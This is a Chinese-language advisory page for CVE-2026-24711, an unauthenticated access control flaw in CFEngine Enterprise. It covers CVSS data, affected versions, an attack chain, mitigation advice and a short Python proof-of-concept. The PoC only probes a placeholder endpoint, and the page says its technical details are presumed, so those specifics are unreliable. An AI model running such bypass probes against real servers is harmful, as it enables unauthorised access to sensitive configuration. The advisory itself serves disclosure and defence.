CVE-2026-24711 CVSS 5.3 中危

CVE-2026-24711: CFEngine Enterprise访问控制不当漏洞

披露日期: 2026-05-14

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-24711

漏洞类型

访问控制不当

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Northern.tech CFEngine Enterprise

漏洞概述

Northern.tech CFEngine Enterprise 在 3.21.8、3.24.3 和 3.27.0 之前的版本中存在访问控制不当漏洞。由于系统未能对特定接口实施严格的权限校验，未经身份验证的远程攻击者可利用该漏洞通过网络直接访问受限资源。该漏洞主要导致机密性影响，攻击者可获取敏感信息，但对系统完整性和可用性无直接影响。

技术细节

该漏洞属于典型的访问控制失效类安全缺陷（CWE-284）。在受影响的 CFEngine Enterprise 版本中，部分管理 API 端点或 Web 接口在处理请求时，未正确验证客户端的会话状态或身份凭证。根据 CVSS 向量分析，攻击复杂度低（AC:L），且无需用户交互（UI:N）即可发起攻击。攻击者只需向目标系统发送特制的 HTTP 请求，即可绕过前端认证机制，直接调用后端敏感接口。由于漏洞未影响完整性和可用性，推测攻击者仅能读取配置信息、策略详情或主机状态等数据，而无法修改系统配置或导致服务拒绝。该漏洞存在于多个旧版本分支中，建议管理员重点排查暴露在公网的 CFEngine 管理端口。

攻击链分析

STEP 1

侦察

攻击者扫描网络，识别运行 Northern.tech CFEngine Enterprise 的目标服务器及其开放的管理端口（通常为 TCP 80 或 443）。

STEP 2

漏洞利用

攻击者向存在漏洞的特定 API 路径发送未经身份验证的 HTTP GET 或 POST 请求，利用系统缺失的访问控制检查。

STEP 3

信息泄露

目标服务器响应请求，返回本应受保护的敏感信息（如系统配置、策略文件等）给攻击者。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Exploit Title: CVE-2026-24711 PoC
# Description: Attempts to access a restricted endpoint without authentication

target_url = "http://<TARGET_IP>:<PORT>/api/endpoint/restricted_data"

try:
    # Send request without authentication headers
    response = requests.get(target_url, timeout=10)
    
    if response.status_code == 200:
        print("[+] Vulnerability Confirmed! Access control bypass successful.")
        print("[+] Response:", response.text[:200])
    else:
        print(f"[-] Target may not be vulnerable. Status code: {response.status_code}")
        
except Exception as e:
    print(f"[!] Error occurred: {e}")

影响范围

CFEngine Enterprise < 3.21.8

CFEngine Enterprise < 3.24.3

CFEngine Enterprise < 3.27.0

防御指南

临时缓解措施

如果无法立即升级补丁，建议将 CFEngine Enterprise 管理界面部署在内网环境，并通过 VPN 或堡垒机进行访问控制，避免直接暴露于公网。同时，可配置 Web 应用防火墙（WAF）规则，拦截对特定敏感接口的未授权请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表